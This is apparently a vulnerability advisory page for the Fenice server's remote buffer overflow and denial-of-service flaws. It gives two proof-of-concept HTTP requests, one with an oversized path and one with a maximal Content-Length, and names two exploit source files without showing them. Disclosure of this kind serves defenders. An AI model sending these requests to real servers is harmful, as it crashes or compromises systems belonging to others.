Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities

info
discussion
exploit
solution
references

Fenice Remote Buffer Overflow and Denial Of Service Vulnerabilities

The following HTTP request is sufficient to demonstrate the buffer-overflow vulnerability:
GET /[approximately 320 'a's] HTTP/1.0

The following HTTP request is sufficient to demonstrate the denial-of-service vulnerabilty:
GET / HTTP/1.0
Content-Length: 4294967295

The following exploit code is available:

/data/vulnerabilities/exploits/fenice.c
/data/vulnerabilities/exploits/FC_oneshot_exploit.c